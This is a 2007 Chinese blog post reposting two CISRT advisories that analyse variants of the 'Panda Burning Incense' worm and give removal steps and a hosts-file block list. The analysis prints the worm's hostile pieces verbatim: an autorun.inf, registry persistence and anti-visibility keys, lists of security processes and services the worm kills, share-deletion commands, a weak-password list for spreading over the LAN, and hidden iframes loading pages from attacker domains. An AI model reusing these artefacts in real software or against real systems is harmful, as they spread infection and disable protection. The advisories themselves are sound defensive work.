星期五, 二月 09, 2007

武汉男生/熊猫烧香感染下载者变种 CTMONTv.exe 解决方案

标签: , , ,

武汉男生感染下载者变种 CTMONTv.exe 解决方案

档案编号:CISRT2007028
病毒名称:N/A(Kaspersky)
病毒别名:Win32.Troj.Small.sg.148992(毒霸)
病毒大小:148,992 字节
加壳方式:
样本MD5:e19ef5f937e6c04014752f5a750a71ec
样本SHA1:220cd8c31548245ee05559030511eea6e177c7ca
发现时间:2007.2
更新时间:2007.2.2
关联病毒:
传播方式:恶意网页、其它病毒下载,通过局域网、移动存储设备传播

技术分析
==========

“熊猫烧香”(武汉男生感染下载者)的变种,与以往不同的是病毒程序图标不是“熊猫烧香”,这次的图标是普通安装程序图标(见附件),而且在实际运行测试中病毒并没有向系统目录复制副本。

病毒运行后复制自身到系统目录:
%System%\drivers\CTMONTv.exe
释放dll文件注入Explorer.exe进程:
%Windows%\ravdll.dll

向各分区根目录复制病毒副本:
X:\setup.exe
X:\autorun.inf

autorun.inf内容:

[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

创建自启动项:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\CTMONTv.exe"

修改注册表使“显示所有文件和文件夹”选项失效:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000

病毒尝试关闭安全相关窗口:
天网
防火墙
进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马清道夫
木馬清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
Windows 任务管理器
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword

尝试结束安全相关进程及Viking病毒进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
runiep.exe

Logo1_.exe
Logo_1.exe
Rundl132.exe

尝试删除安全相关启动项:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

尝试删除安全相关服务:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsCCenter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsRavMon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsCCenter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsRavMon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KVWSC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KVSrvXP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AVP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McAfeeFramework
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTaskManager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\navapsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KPfwSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccProxy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccEvtMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccSetMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Symantec Core LC
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MskService
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FireSvc

删除除以下目录外其它目录中的gho文件,并修改htm/html/asp/php/jsp/aspx网页文件:
C:\
C:\WINDOWS\
C:\WINNT\
C:\WINDOWS\system32\
C:\WINNT\system32\
C:\Documents and Settings\
C:\System Volume Information\
C:\Recycled\
C:\Program Files\Windows NT\
C:\Program Files\WindowsUpdate\
C:\Program Files\Windows Media Player\
C:\Program Files\Outlook Express\
C:\Program Files\Internet Explorer\
C:\Program Files\NetMeeting\
C:\Program Files\Common Files\
C:\Program Files\ComPlus Applications\
C:\Program Files\Messenger\
C:\Program Files\InstallShield Installation Information\
C:\Program Files\MSN\
C:\Program Files\Microsoft Frontpage\
C:\Program Files\Movie Maker\
C:\Program Files\MSN Gamin Zone\
在文件尾部追加隐藏iframe代码:

<iframe src="http://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"></iframe>

尝试使用命令删除管理共享:

cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y

尝试使用弱密码访问局域网内其它计算机:
Administrator
Guest
admin
Root

1234
password
6969
harley
123456
golf
pussy
mustang
1111
shadow
1313
fish
5150
7777
qwerty
baseball
2112
letmein
12345678
12345
ccc
admin
5201314
qq520
1
12
123
1234567
123456789
654321
54321
111
000000
abc
pw
11111111
88888888
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
520
super
123asd
0
ihavenopass
godblessyou
enable
xp
2002
2003
2600
alpha
110
111111
121212
123123
1234qwer
123abc
007
a
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
pc
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
pw123
love
mypc
mypc123
admin123
mypass
mypass123
901100
将病毒自身以GameSetup.exe文件名复制过去。

病毒内包含文字信息如下:

***武*汉*男*生*感*染*下*载*者***
感谢艾玛,mopery对此木马的关注!~
xboy
whboy

清除步骤
==========

1. 断开网络

2. 结束病毒进程:
%System%\drivers\CTMONTv.exe

3. 删除病毒文件:
%System%\drivers\CTMONTv.exe

4. 通过分区盘符右键菜单的“打开”进入根目录,删除病毒文件:
X:\setup.exe
X:\autorun.inf

5. 重新启动计算机

6. 删除病毒文件:
%Windows%\ravdll.dll

7. 删除病毒启动项:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\CTMONTv.exe"

8. 修改注册表,恢复“显示所有文件和文件夹”选项功能:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001

9. 修复或重新安装被破坏的安全相关软件,并使用反病毒软件进行全盘扫描

10. 恢复被修改的网页文件,可以使用反病毒软件清除,也可以使用Dreamweaver等网页编辑工具的替换功能删除被追加的恶意代码

建议设置禁止访问lovebak.com/krvkr.com/whboy.net+CISRT发布熊猫烧香新变种ncscv32.exe解决方案2007-01-31 09:24CISRT发布熊猫烧香新变种ncscv32.exe解决方案

档案编号:CISRT2007023
病毒名称:Worm.Win32.Fujack.l(Kaspersky)
病毒别名:Worm.Nimaya.cf(瑞星)
      Worm.WhBoy.bx.68778(毒霸)
病毒大小:68,938 字节
加壳方式:FSG
样本MD5:0ae2056fa8c99331332fe3cd4e31342d
样本SHA1:e02edb9c99055e00a3390638d0d7b02f9942dcb2
发现时间:2007.1
更新时间:2007.1.24
关联病毒:
传播方式:恶意网页、其它病毒下载,可通过局域网传播

技术分析
==========

熊猫烧香的新变种,与之前变种【CISRT2007017】熊猫烧香变种 感染文件 修改网页 ncscv32.exe 解决方案类似。

运行后复制自身到系统目录并运行:
%System%\drivers\ncscv32.exe
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"nvscv32"="%System%\drivers\ncscv32.exe"

修改注册表使“显示所有文件和文件夹”设置失效:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000

尝试关闭安全相关窗口:
天网
防火墙
VirusScan
Symantec AntiVirus
System Safety Monitor
System Repair Engineer
Wrapped gift Killer
游戏木马检测大师
超级巡警

尝试结束安全相关进程,以及自身之前变种、Viking病毒进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
SREng.EXE
spoclsv.exe
nvscv32.exe
sppoolsv.exe
spo0lsv.exe

删除安全相关服务:
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc

删除安全相关启动项:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse

跳过以下目录感染EXE/SCR/PIF/COM文件,但不感染setup.exe和NTDETECT.COM:
C:\
C:\WINDOWS
C:\WINNT
C:\WINDOWS\system32
C:\WINNT\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
%ProgramFiles%\Windows NT
%ProgramFiles%\WindowsUpdate
%ProgramFiles%\Windows Media Player
%ProgramFiles%\Outlook Express
%ProgramFiles%\Internet Explorer
%ProgramFiles%\NetMeeting
%ProgramFiles%\Common Files
%ProgramFiles%\ComPlus Applications
%ProgramFiles%\Messenger
%ProgramFiles%\InstallShield Installation Information
%ProgramFiles%\Microsoft Frontpage
%ProgramFiles%\Movie Maker
%ProgramFiles%\MSN Gamin Zone

将自身捆绑在被感染文件前端的感染方式类似之前变种,并在尾部添加标记信息:WHBOY{原文件名}.exe {原文件字节大小}

修改除上述目录中的htm/html/asp/php/jsp/aspx网页文件,在文件尾部追加隐藏iframe代码:<iframe src=hxxp://www.lovebak.com/qq.htm width="0" height="0"></iframe>

病毒遍历过的目录下会留下Desktop__.ini文件,内容是当前日期

使用弱密码尝试以Games.exe文件名复制自身到局域网内其它计算机

原来留有“交流字符”的地方现在显示如下:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
adsf
hjjjjjj
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!

PS:罗列一下威金和熊猫的种类

ViKing种类:Logo1_.exe/Logo_1.exe/Rundl132.exe

Nimuya种类:ncscv32.exe/spoclsv.exe/nvscv32.exe/sppoolsv.exe/spo0lsv.exe

建议设置禁止访问lovebak.com/krvkr.com/whboy.net熊猫更新服务站点
59.63.157.80
hxxp://www.lovebak.com 2007-01-23注册的新域名
hxxp://www.krvkr.com 作恶多端的老域名
hxxp://www.whboy.net

示例如下:

drivers\etc\hosts
127.0.0.1 59.63.157.80
127.0.0.1 lovebak.com
127.0.0.1 krvkr.com
127.0.0.1 whboy.net

发帖者 查皮 时间: 10:54:00 下午

没有评论:

发表评论

订阅: 博文评论 (Atom)

推广链接